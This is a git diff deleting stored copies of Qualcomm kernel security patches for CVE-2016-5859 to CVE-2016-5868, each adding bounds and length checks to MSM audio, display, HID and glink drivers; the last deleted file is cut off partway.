deleted file mode 100644
index cc19637b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5859/3.18/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 97fdb441a9fb330a76245e473bc1a2155c809ebe Mon Sep 17 00:00:00 2001
-From: Sharad Sangle <assangle@codeaurora.org>
-Date: Tue, 13 Dec 2016 14:35:39 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-To avoid buffer overflow, validate input length used to
-fetch visualizer data.
-
-CRs-fixed: 1096672
-Change-Id: I224bc2f20d94182713c565972fb0bd52cad6f3fd
-Signed-off-by: Sharad Sangle <assangle@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c | 11 ++++++++++-
- 1 file changed, 10 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-index bb0f890..5866e46 100644
---- a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2014, 2016, The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -18,6 +18,10 @@
- 
- #include "msm-dolby-dap-config.h"
- 
-+#ifndef DOLBY_PARAM_VCNB_MAX_LENGTH
-+#define DOLBY_PARAM_VCNB_MAX_LENGTH 40
-+#endif
-+
- /* dolby endp based parameters */
- struct dolby_dap_endp_params_s {
- 	int device;
-@@ -896,6 +900,11 @@ int msm_dolby_dap_param_visualizer_control_get(struct snd_kcontrol *kcontrol,
- 	uint32_t param_payload_len =
- 		DOLBY_PARAM_PAYLOAD_SIZE * sizeof(uint32_t);
- 	int port_id, copp_idx, idx;
-+	if (length > DOLBY_PARAM_VCNB_MAX_LENGTH || length <= 0) {
-+		pr_err("%s Incorrect VCNB length", __func__);
-+		ucontrol->value.integer.value[0] = 0;
-+		return -EINVAL;
-+	}
- 	for (idx = 0; idx < AFE_MAX_PORTS; idx++) {
- 		port_id = dolby_dap_params_states.port_id[idx];
- 		copp_idx = dolby_dap_params_states.copp_idx[idx];
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5860/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-5860/3.10/0001.patch
deleted file mode 100644
index 40111085..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5860/3.10/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 25ab82f5d7d8d8d3b4c8eaaa02944dd5a81be7c3 Mon Sep 17 00:00:00 2001
-From: Karthik Reddy Katta <a_katta@codeaurora.org>
-Date: Wed, 28 Dec 2016 11:24:33 +0530
-Subject: drivers: soc: qcom: Add overflow check for sound model size
-
-Overflow check is added for sound model size to prevent
-heap overflow while allocating memory for sound model data.
-
-CRs-Fixed: 1100682
-Change-Id: Id38523a5e79028c692670e84d5fe924a855a5a10
-Signed-off-by: Karthik Reddy Katta <a_katta@codeaurora.org>
----
- sound/soc/msm/msm-cpe-lsm.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/soc/msm/msm-cpe-lsm.c b/sound/soc/msm/msm-cpe-lsm.c
-index d5b675f..a4daf91d 100644
---- a/sound/soc/msm/msm-cpe-lsm.c
-+++ b/sound/soc/msm/msm-cpe-lsm.c
-@@ -1913,6 +1913,13 @@ static int msm_cpe_lsm_reg_model(struct snd_pcm_substream *substream,
- 
- 	lsm_ops->lsm_get_snd_model_offset(cpe->core_handle,
- 			session, &offset);
-+	/* Check if 'p_info->param_size + offset' crosses U32_MAX. */
-+	if (p_info->param_size > U32_MAX - offset) {
-+		dev_err(rtd->dev,
-+			"%s: Invalid param_size %d\n",
-+			__func__, p_info->param_size);
-+		return -EINVAL;
-+	}
- 	session->snd_model_size = p_info->param_size + offset;
- 
- 	session->snd_model_data = vzalloc(session->snd_model_size);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5860/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-5860/3.18/0002.patch
deleted file mode 100644
index 5b3d26f9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5860/3.18/0002.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 9bcf048a7d1a8a0511feb39d6d3111044e6278ec Mon Sep 17 00:00:00 2001
-From: Karthik Reddy Katta <a_katta@codeaurora.org>
-Date: Wed, 28 Dec 2016 11:24:33 +0530
-Subject: drivers: soc: qcom: Add overflow check for sound model size
-
-Overflow check is added for sound model size to prevent
-heap overflow while allocating memory for sound model data.
-
-CRs-Fixed: 1100682
-Change-Id: Id38523a5e79028c692670e84d5fe924a855a5a10
-Signed-off-by: Karthik Reddy Katta <a_katta@codeaurora.org>
----
- sound/soc/msm/msm-cpe-lsm.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/soc/msm/msm-cpe-lsm.c b/sound/soc/msm/msm-cpe-lsm.c
-index 6483b93..0c10829 100644
---- a/sound/soc/msm/msm-cpe-lsm.c
-+++ b/sound/soc/msm/msm-cpe-lsm.c
-@@ -1874,6 +1874,13 @@ static int msm_cpe_lsm_reg_model(struct snd_pcm_substream *substream,
- 
- 	lsm_ops->lsm_get_snd_model_offset(cpe->core_handle,
- 			session, &offset);
-+	/* Check if 'p_info->param_size + offset' crosses U32_MAX. */
-+	if (p_info->param_size > U32_MAX - offset) {
-+		dev_err(rtd->dev,
-+			"%s: Invalid param_size %d\n",
-+			__func__, p_info->param_size);
-+		return -EINVAL;
-+	}
- 	session->snd_model_size = p_info->param_size + offset;
- 
- 	session->snd_model_data = vzalloc(session->snd_model_size);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5860/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2016-5860/4.4/0003.patch
deleted file mode 100644
index c005480c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5860/4.4/0003.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 9f91ae0d7203714fc39ae78e1f1c4fd71ed40498 Mon Sep 17 00:00:00 2001
-From: Karthik Reddy Katta <a_katta@codeaurora.org>
-Date: Wed, 28 Dec 2016 11:24:33 +0530
-Subject: drivers: soc: qcom: Add overflow check for sound model size
-
-Overflow check is added for sound model size to prevent
-heap overflow while allocating memory for sound model data.
-
-CRs-Fixed: 1100682
-Change-Id: Id38523a5e79028c692670e84d5fe924a855a5a10
-Signed-off-by: Karthik Reddy Katta <a_katta@codeaurora.org>
----
- sound/soc/msm/msm-cpe-lsm.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/soc/msm/msm-cpe-lsm.c b/sound/soc/msm/msm-cpe-lsm.c
-index ef4c9b0..5b90cc1 100644
---- a/sound/soc/msm/msm-cpe-lsm.c
-+++ b/sound/soc/msm/msm-cpe-lsm.c
-@@ -1878,6 +1878,13 @@ static int msm_cpe_lsm_reg_model(struct snd_pcm_substream *substream,
- 
- 	lsm_ops->lsm_get_snd_model_offset(cpe->core_handle,
- 			session, &offset);
-+	/* Check if 'p_info->param_size + offset' crosses U32_MAX. */
-+	if (p_info->param_size > U32_MAX - offset) {
-+		dev_err(rtd->dev,
-+			"%s: Invalid param_size %d\n",
-+			__func__, p_info->param_size);
-+		return -EINVAL;
-+	}
- 	session->snd_model_size = p_info->param_size + offset;
- 
- 	session->snd_model_data = vzalloc(session->snd_model_size);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5861/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5861/ANY/0001.patch
deleted file mode 100644
index b764d960..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5861/ANY/0001.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From cf3c97b8b6165f13810e530068fbf94b07f1f77d Mon Sep 17 00:00:00 2001
-From: Ping Li <pingli@codeaurora.org>
-Date: Tue, 3 Jan 2017 11:48:06 -0800
-Subject: msm: mdss: Add sanity check for Gamut LUT size
-
-The Gamut LUT size passed from user space needs to go through
-a sanity check to avoid heap overflow. This patch adds the missing
-sanity check in the Gamut LUT config write path.
-
-Change-Id: I365938e06dbc6ca01961c9be01db10a5a9c863e4
-Signed-off-by: Ping Li <pingli@codeaurora.org>
----
- drivers/video/fbdev/msm/mdss_mdp_pp.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/fbdev/msm/mdss_mdp_pp.c b/drivers/video/fbdev/msm/mdss_mdp_pp.c
-index 30dd3c8..951beae 100644
---- a/drivers/video/fbdev/msm/mdss_mdp_pp.c
-+++ b/drivers/video/fbdev/msm/mdss_mdp_pp.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -4827,6 +4827,11 @@ gamut_clk_off:
- 				goto gamut_set_dirty;
- 			}
- 		}
-+		if (pp_gm_has_invalid_lut_size(config)) {
-+			pr_debug("invalid lut size for gamut\n");
-+			ret = -EINVAL;
-+			goto gamut_config_exit;
-+		}
- 		local_cfg = *config;
- 		tbl_off = mdss_pp_res->gamut_tbl[disp_num];
- 		for (i = 0; i < MDP_GAMUT_TABLE_NUM; i++) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5862/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5862/ANY/0001.patch
deleted file mode 100644
index cfff207a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5862/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 4199451e83729a3add781eeafaee32994ff65b04 Mon Sep 17 00:00:00 2001
-From: Aditya Bavanari <abavanar@codeaurora.org>
-Date: Thu, 22 Dec 2016 16:41:27 +0530
-Subject: ASoC: msm8996: Fix kernel crash in "Speaker Function" mixer control
-
-Use snd_soc_kcontrol_codec instead of snd_kcontrol_chip
-to obtain the codec information from the kcontrol.
-
-CRs-Fixed: 1099607
-Change-Id: Iba3004c2745e5f0bbe778e44c803826351b3b939
-Signed-off-by: Aditya Bavanari <abavanar@codeaurora.org>
----
- sound/soc/msm/msm8996.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/msm8996.c b/sound/soc/msm/msm8996.c
-index 84d4ede..4eafd32 100644
---- a/sound/soc/msm/msm8996.c
-+++ b/sound/soc/msm/msm8996.c
-@@ -351,7 +351,7 @@ static int msm8996_get_spk(struct snd_kcontrol *kcontrol,
- static int msm8996_set_spk(struct snd_kcontrol *kcontrol,
- 			      struct snd_ctl_elem_value *ucontrol)
- {
--	struct snd_soc_codec *codec = snd_kcontrol_chip(kcontrol);
-+	struct snd_soc_codec *codec = snd_soc_kcontrol_codec(kcontrol);
- 
- 	pr_debug("%s() ucontrol->value.integer.value[0] = %ld\n",
- 		 __func__, ucontrol->value.integer.value[0]);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5863/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5863/ANY/0001.patch
deleted file mode 100644
index 53e70f2e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5863/ANY/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From daf0acd54a6a80de227baef9a06285e4aa5f8c93 Mon Sep 17 00:00:00 2001
-From: Sriharsha Allenki <sallenki@codeaurora.org>
-Date: Thu, 22 Dec 2016 14:57:44 +0530
-Subject: hid: usbhid: Changes to prevent buffer overflow
-
-Moved some value checks to right positions to prevent
-buffer flow, which may be possible before. Previously
-these value checks are in an else statement which may
-not be executed.
-
-Change-Id: I02dbecd074183581a6bdae6377097bc004bd3d3c
-CRs-fixed: 1102936
-Signed-off-by: Sriharsha Allenki <sallenki@codeaurora.org>
----
- drivers/hid/usbhid/hiddev.c | 19 ++++++++++---------
- 1 file changed, 10 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/hid/usbhid/hiddev.c b/drivers/hid/usbhid/hiddev.c
-index 2f1ddca..602f163 100644
---- a/drivers/hid/usbhid/hiddev.c
-+++ b/drivers/hid/usbhid/hiddev.c
-@@ -510,18 +510,19 @@ static noinline int hiddev_ioctl_usage(struct hiddev *hiddev, unsigned int cmd,
- 				goto inval;
- 
- 			field = report->field[uref->field_index];
-+		}
- 
--			if (cmd == HIDIOCGCOLLECTIONINDEX) {
--				if (uref->usage_index >= field->maxusage)
--					goto inval;
--			} else if (uref->usage_index >= field->report_count)
-+		if (cmd == HIDIOCGCOLLECTIONINDEX) {
-+			if (uref->usage_index >= field->maxusage)
- 				goto inval;
-+		} else if (uref->usage_index >= field->report_count)
-+			goto inval;
- 
--			else if ((cmd == HIDIOCGUSAGES || cmd == HIDIOCSUSAGES) &&
--				 (uref_multi->num_values > HID_MAX_MULTI_USAGES ||
--				  uref->usage_index + uref_multi->num_values > field->report_count))
--				goto inval;
--		}
-+		else if ((cmd == HIDIOCGUSAGES || cmd == HIDIOCSUSAGES) &&
-+			 (uref_multi->num_values > HID_MAX_MULTI_USAGES ||
-+			uref->usage_index + uref_multi->num_values >
-+			field->report_count))
-+			goto inval;
- 
- 		switch (cmd) {
- 		case HIDIOCGUSAGE:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5864/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5864/ANY/0001.patch
deleted file mode 100644
index b8fbce6c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5864/ANY/0001.patch
+++ /dev/null
@@ -1,132 +0,0 @@
-From cbc21ceb69cb7bca0643423a7ca982abce3ce50a Mon Sep 17 00:00:00 2001
-From: Vidyakumar Athota <vathota@codeaurora.org>
-Date: Wed, 4 Jan 2017 13:32:50 -0800
-Subject: soc: qcom: check userspace buffer size in write()
-
-Add checks to make sure userspace buffer is valid before
-it is used. Add upper limit for glink channels and number
-of intents allowed.
-
-Change-Id: I9b8f2e47aada7922ba22cbb010176bf36a9d6288
-Signed-off-by: Vidyakumar Athota <vathota@codeaurora.org>
----
- drivers/soc/qcom/wcd-dsp-glink.c | 51 ++++++++++++++++++++++++++++++++--------
- 1 file changed, 41 insertions(+), 10 deletions(-)
-
-diff --git a/drivers/soc/qcom/wcd-dsp-glink.c b/drivers/soc/qcom/wcd-dsp-glink.c
-index 27e66dc..1ceded4 100644
---- a/drivers/soc/qcom/wcd-dsp-glink.c
-+++ b/drivers/soc/qcom/wcd-dsp-glink.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2016-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -25,8 +25,10 @@
- #include "sound/wcd-dsp-glink.h"
- 
- #define WDSP_GLINK_DRIVER_NAME "wcd-dsp-glink"
--#define WDSP_MAX_WRITE_SIZE (512 * 1024)
-+#define WDSP_MAX_WRITE_SIZE (256 * 1024)
- #define WDSP_MAX_READ_SIZE (4 * 1024)
-+#define WDSP_MAX_NO_OF_INTENTS (20)
-+#define WDSP_MAX_NO_OF_CHANNELS (10)
- 
- #define MINOR_NUMBER_COUNT 1
- #define WDSP_EDGE "wdsp"
-@@ -532,15 +534,30 @@ static int wdsp_glink_ch_info_init(struct wdsp_glink_priv *wpriv,
- 	payload = (u8 *)pkt->payload;
- 	no_of_channels = pkt->no_of_channels;
- 
-+	if (no_of_channels > WDSP_MAX_NO_OF_CHANNELS) {
-+		dev_info(wpriv->dev, "%s: no_of_channels = %d are limited to %d\n",
-+			 __func__, no_of_channels, WDSP_MAX_NO_OF_CHANNELS);
-+		no_of_channels = WDSP_MAX_NO_OF_CHANNELS;
-+	}
- 	ch = kcalloc(no_of_channels, sizeof(struct wdsp_glink_ch *),
- 		     GFP_KERNEL);
- 	if (!ch) {
- 		ret = -ENOMEM;
- 		goto done;
- 	}
-+	wpriv->ch = ch;
-+	wpriv->no_of_channels = no_of_channels;
- 
- 	for (i = 0; i < no_of_channels; i++) {
- 		ch_cfg = (struct wdsp_glink_ch_cfg *)payload;
-+
-+		if (ch_cfg->no_of_intents > WDSP_MAX_NO_OF_INTENTS) {
-+			dev_err(wpriv->dev, "%s: Invalid no_of_intents = %d\n",
-+				__func__, ch_cfg->no_of_intents);
-+			ret = -EINVAL;
-+			goto err_ch_mem;
-+		}
-+
- 		ch_cfg_size = sizeof(struct wdsp_glink_ch_cfg) +
- 					(sizeof(u32) * ch_cfg->no_of_intents);
- 		ch_size = sizeof(struct wdsp_glink_ch) +
-@@ -564,8 +581,6 @@ static int wdsp_glink_ch_info_init(struct wdsp_glink_priv *wpriv,
- 		INIT_WORK(&ch[i]->lcl_ch_cls_wrk, wdsp_glink_lcl_ch_cls_wrk);
- 		init_waitqueue_head(&ch[i]->ch_connect_wait);
- 	}
--	wpriv->ch = ch;
--	wpriv->no_of_channels = no_of_channels;
- 
- 	INIT_WORK(&wpriv->ch_open_cls_wrk, wdsp_glink_ch_open_cls_wrk);
- 
-@@ -746,15 +761,17 @@ static ssize_t wdsp_glink_write(struct file *file, const char __user *buf,
- 		goto done;
- 	}
- 
--	dev_dbg(wpriv->dev, "%s: count = %zd\n", __func__, count);
--
--	if (count > WDSP_MAX_WRITE_SIZE) {
--		dev_info(wpriv->dev, "%s: count = %zd is more than WDSP_MAX_WRITE_SIZE\n",
-+	if ((count < sizeof(struct wdsp_write_pkt)) ||
-+	    (count > WDSP_MAX_WRITE_SIZE)) {
-+		dev_err(wpriv->dev, "%s: Invalid count = %zd\n",
- 			__func__, count);
--		count = WDSP_MAX_WRITE_SIZE;
-+		ret = -EINVAL;
-+		goto done;
- 	}
- 
--	tx_buf_size = count + sizeof(struct wdsp_glink_tx_buf);
-+	dev_dbg(wpriv->dev, "%s: count = %zd\n", __func__, count);
-+
-+	tx_buf_size = WDSP_MAX_WRITE_SIZE + sizeof(struct wdsp_glink_tx_buf);
- 	tx_buf = kzalloc(tx_buf_size, GFP_KERNEL);
- 	if (!tx_buf) {
- 		ret = -ENOMEM;
-@@ -772,6 +789,13 @@ static ssize_t wdsp_glink_write(struct file *file, const char __user *buf,
- 	wpkt = (struct wdsp_write_pkt *)tx_buf->buf;
- 	switch (wpkt->pkt_type) {
- 	case WDSP_REG_PKT:
-+		if (count <= (sizeof(struct wdsp_write_pkt) +
-+			      sizeof(struct wdsp_reg_pkt))) {
-+			dev_err(wpriv->dev, "%s: Invalid reg pkt size = %zd\n",
-+				__func__, count);
-+			ret = -EINVAL;
-+			goto free_buf;
-+		}
- 		ret = wdsp_glink_ch_info_init(wpriv,
- 					(struct wdsp_reg_pkt *)wpkt->payload);
- 		if (IS_ERR_VALUE(ret))
-@@ -794,6 +818,13 @@ static ssize_t wdsp_glink_write(struct file *file, const char __user *buf,
- 		kfree(tx_buf);
- 		break;
- 	case WDSP_CMD_PKT:
-+		if (count <= (sizeof(struct wdsp_write_pkt) +
-+			      sizeof(struct wdsp_cmd_pkt))) {
-+			dev_err(wpriv->dev, "%s: Invalid cmd pkt size = %zd\n",
-+				__func__, count);
-+			ret = -EINVAL;
-+			goto free_buf;
-+		}
- 		mutex_lock(&wpriv->glink_mutex);
- 		if (wpriv->glink_state.link_state == GLINK_LINK_STATE_DOWN) {
- 			mutex_unlock(&wpriv->glink_mutex);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5867/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-5867/3.10/0001.patch
deleted file mode 100644
index fd845599..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5867/3.10/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 8db70aafea51b60dbe9faaba5707be0046758521 Mon Sep 17 00:00:00 2001
-From: Sharad Sangle <assangle@codeaurora.org>
-Date: Mon, 19 Dec 2016 17:00:25 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-To avoid buffer overflow, validate input length used to
-set Dolby params.
-
-Change-Id: I3f9d6040f118f63b60c20c83b0d8cae638f4a530
-CRs-Fixed: 1095947
-Signed-off-by: Sharad Sangle <assangle@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c | 15 ++++++++++++++-
- 1 file changed, 14 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-index bb0f890..493daf4 100644
---- a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-@@ -677,7 +677,7 @@ int msm_dolby_dap_param_to_set_control_put(struct snd_kcontrol *kcontrol,
- 					   struct snd_ctl_elem_value *ucontrol)
- {
- 	int rc = 0, port_id, copp_idx;
--	uint32_t idx, j;
-+	uint32_t idx, j, current_offset;
- 	uint32_t device = ucontrol->value.integer.value[0];
- 	uint32_t param_id = ucontrol->value.integer.value[1];
- 	uint32_t offset = ucontrol->value.integer.value[2];
-@@ -754,6 +754,19 @@ int msm_dolby_dap_param_to_set_control_put(struct snd_kcontrol *kcontrol,
- 		default: {
- 			/* cache the parameters */
- 			dolby_dap_params_modified[idx] += 1;
-+			current_offset = dolby_dap_params_offset[idx] + offset;
-+			if (current_offset >= TOTAL_LENGTH_DOLBY_PARAM) {
-+				pr_err("%s: invalid offset %d at idx %d\n",
-+				__func__, offset, idx);
-+				return -EINVAL;
-+			}
-+			if ((0 == length) || (current_offset + length - 1
-+				< current_offset) || (current_offset + length
-+				> TOTAL_LENGTH_DOLBY_PARAM)) {
-+				pr_err("%s: invalid length %d at idx %d\n",
-+				__func__, length, idx);
-+				return -EINVAL;
-+			}
- 			dolby_dap_params_length[idx] = length;
- 			pr_debug("%s: param recvd deviceId=0x%x paramId=0x%x offset=%d length=%d\n",
- 				__func__, device, param_id, offset, length);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5867/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-5867/3.18/0002.patch
deleted file mode 100644
index 2d7611f0..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5867/3.18/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 065360da7147003aed8f59782b7652d565f56be5 Mon Sep 17 00:00:00 2001
-From: Sharad Sangle <assangle@codeaurora.org>
-Date: Mon, 19 Dec 2016 17:00:25 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-To avoid buffer overflow, validate input length used to
-set Dolby params.
-
-Change-Id: I3f9d6040f118f63b60c20c83b0d8cae638f4a530
-CRs-Fixed: 1095947
-Signed-off-by: Sharad Sangle <assangle@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c | 15 ++++++++++++++-
- 1 file changed, 14 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-index 5866e46..d270b3d 100644
---- a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-@@ -681,7 +681,7 @@ int msm_dolby_dap_param_to_set_control_put(struct snd_kcontrol *kcontrol,
- 					   struct snd_ctl_elem_value *ucontrol)
- {
- 	int rc = 0, port_id, copp_idx;
--	uint32_t idx, j;
-+	uint32_t idx, j, current_offset;
- 	uint32_t device = ucontrol->value.integer.value[0];
- 	uint32_t param_id = ucontrol->value.integer.value[1];
- 	uint32_t offset = ucontrol->value.integer.value[2];
-@@ -758,6 +758,19 @@ int msm_dolby_dap_param_to_set_control_put(struct snd_kcontrol *kcontrol,
- 		default: {
- 			/* cache the parameters */
- 			dolby_dap_params_modified[idx] += 1;
-+			current_offset = dolby_dap_params_offset[idx] + offset;
-+			if (current_offset >= TOTAL_LENGTH_DOLBY_PARAM) {
-+				pr_err("%s: invalid offset %d at idx %d\n",
-+				__func__, offset, idx);
-+				return -EINVAL;
-+			}
-+			if ((0 == length) || (current_offset + length - 1
-+				< current_offset) || (current_offset + length
-+				> TOTAL_LENGTH_DOLBY_PARAM)) {
-+				pr_err("%s: invalid length %d at idx %d\n",
-+				__func__, length, idx);
-+				return -EINVAL;
-+			}
- 			dolby_dap_params_length[idx] = length;
- 			pr_debug("%s: param recvd deviceId=0x%x paramId=0x%x offset=%d length=%d\n",
- 				__func__, device, param_id, offset, length);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5867/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2016-5867/4.4/0003.patch
deleted file mode 100644
index ec36d15d..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5867/4.4/0003.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 5e3dd3f21b44424405a009ba676df52322d9e7cf Mon Sep 17 00:00:00 2001
-From: Sharad Sangle <assangle@codeaurora.org>
-Date: Mon, 19 Dec 2016 17:00:25 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-To avoid buffer overflow, validate input length used to
-set Dolby params.
-
-Change-Id: I3f9d6040f118f63b60c20c83b0d8cae638f4a530
-CRs-Fixed: 1095947
-Signed-off-by: Sharad Sangle <assangle@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c | 15 ++++++++++++++-
- 1 file changed, 14 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-index df32ede..8da75d7 100644
---- a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-@@ -681,7 +681,7 @@ int msm_dolby_dap_param_to_set_control_put(struct snd_kcontrol *kcontrol,
- 					   struct snd_ctl_elem_value *ucontrol)
- {
- 	int rc = 0, port_id, copp_idx;
--	uint32_t idx, j;
-+	uint32_t idx, j, current_offset;
- 	uint32_t device = ucontrol->value.integer.value[0];
- 	uint32_t param_id = ucontrol->value.integer.value[1];
- 	uint32_t offset = ucontrol->value.integer.value[2];
-@@ -758,6 +758,19 @@ int msm_dolby_dap_param_to_set_control_put(struct snd_kcontrol *kcontrol,
- 		default: {
- 			/* cache the parameters */
- 			dolby_dap_params_modified[idx] += 1;
-+			current_offset = dolby_dap_params_offset[idx] + offset;
-+			if (current_offset >= TOTAL_LENGTH_DOLBY_PARAM) {
-+				pr_err("%s: invalid offset %d at idx %d\n",
-+				__func__, offset, idx);
-+				return -EINVAL;
-+			}
-+			if ((length == 0) || (current_offset + length - 1
-+				< current_offset) || (current_offset + length
-+				> TOTAL_LENGTH_DOLBY_PARAM)) {
-+				pr_err("%s: invalid length %d at idx %d\n",
-+				__func__, length, idx);
-+				return -EINVAL;
-+			}
- 			dolby_dap_params_length[idx] = length;
- 			pr_debug("%s: param recvd deviceId=0x%x paramId=0x%x offset=%d length=%d\n",
- 				__func__, device, param_id, offset, length);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5868/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-5868/3.10/0001.patch
deleted file mode 100644
index c78fd7d3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5868/3.10/0001.patch
+++ /dev/null
@@ -1,525 +0,0 @@
-From dc85dc0b21b1ee3715ee6e80f405d5606ca5e8d2 Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi <gfodi@codeaurora.org>
-Date: Tue, 3 Jan 2017 12:11:18 +0200
-Subject: msm: rndis_ipa: Remove rndis_ipa loopback functionality
-
-Rndis_ipa loopback functionality at rndis_ipa driver
-is a debug functionality that is not used.
-
-Change-Id: Ibbcb26d3871cffeb46b028efcf4d428e88eb9e10
-CRs-fixed: 1104431
-Signed-off-by: Ghanim Fodi <gfodi@codeaurora.org>
----
- drivers/net/ethernet/msm/rndis_ipa.c | 432 +----------------------------------
- 1 file changed, 1 insertion(+), 431 deletions(-)
-
-diff --git a/drivers/net/ethernet/msm/rndis_ipa.c b/drivers/net/ethernet/msm/rndis_ipa.c
-index 09b85fb..c61e2a7 100644
---- a/drivers/net/ethernet/msm/rndis_ipa.c
-+++ b/drivers/net/ethernet/msm/rndis_ipa.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2015, 2017 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -132,29 +132,6 @@ enum rndis_ipa_operation {
- 	RNDIS_IPA_DEBUG("Driver state: %s\n",\
- 	rndis_ipa_state_string(ctx->state));
- 
--/**
-- * struct rndis_loopback_pipe - hold all information needed for
-- *  pipe loopback logic
-- */
--struct rndis_loopback_pipe {
--	struct sps_pipe          *ipa_sps;
--	struct ipa_sps_params ipa_sps_connect;
--	struct ipa_connect_params ipa_connect_params;
--
--	struct sps_pipe          *dma_sps;
--	struct sps_connect        dma_connect;
--
--	struct sps_alloc_dma_chan dst_alloc;
--	struct sps_dma_chan       ipa_sps_channel;
--	enum sps_mode mode;
--	u32 ipa_peer_bam_hdl;
